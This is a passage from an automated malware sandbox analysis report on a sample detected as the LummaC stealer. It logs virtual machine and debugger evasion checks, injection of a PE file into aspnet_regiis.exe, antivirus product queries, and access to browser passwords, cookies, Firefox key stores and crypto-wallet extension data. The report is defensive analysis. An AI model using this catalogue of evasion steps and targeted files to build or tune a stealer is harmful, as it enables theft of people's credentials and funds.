Source: C:\Users\user\Desktop\b.exe	Memory allocated: 86F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Memory allocated: 96F0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 7756

Thread sleep time: -180000s >= -30000s

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: aspnet_regiis.exe, 00000002.00000002.1925078989.000000000289C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1924361265.000000000289C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: aspnet_regiis.exe, 00000002.00000002.1925078989.00000000028CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1924361265.00000000028CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWq
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000002.00000002.1925078989.00000000028CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1924361265.00000000028CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\b.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_0247FAC0 LdrInitializeThunk,

2_2_0247FAC0

Source: C:\Users\user\Desktop\b.exe

Code function: 0_2_6CDE160A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6CDE160A

Source: C:\Users\user\Desktop\b.exe	Code function: 0_2_6CDE2D95 mov eax, dword ptr fs:[00000030h]		0_2_6CDE2D95
Source: C:\Users\user\Desktop\b.exe	Code function: 0_2_6CDE3F69 mov eax, dword ptr fs:[00000030h]		0_2_6CDE3F69

Source: C:\Users\user\Desktop\b.exe

Code function: 0_2_6CDE5B7C GetProcessHeap,

0_2_6CDE5B7C

Source: C:\Users\user\Desktop\b.exe	Code function: 0_2_6CDE1131 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6CDE1131
Source: C:\Users\user\Desktop\b.exe	Code function: 0_2_6CDE160A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6CDE160A
Source: C:\Users\user\Desktop\b.exe	Code function: 0_2_6CDE3F9A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6CDE3F9A

Source: C:\Users\user\Desktop\b.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\b.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2440000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\b.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2440000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\b.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2440000	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2441000	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2484000	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2487000	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2498000	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2499000	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2441000	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2484000	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2487000	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2498000	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2499000	Jump to behavior
Source: C:\Users\user\Desktop\b.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2641008	Jump to behavior

Source: C:\Users\user\Desktop\b.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"

Jump to behavior

Source: C:\Users\user\Desktop\b.exe

Code function: 0_2_6CDE17D8 cpuid

0_2_6CDE17D8

Source: C:\Users\user\Desktop\b.exe	Queries volume information: C:\Users\user\Desktop\b.exe VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\b.exe

Code function: 0_2_6CDE1253 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6CDE1253

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: aspnet_regiis.exe, 00000002.00000003.1876677261.0000000002935000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 7728, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
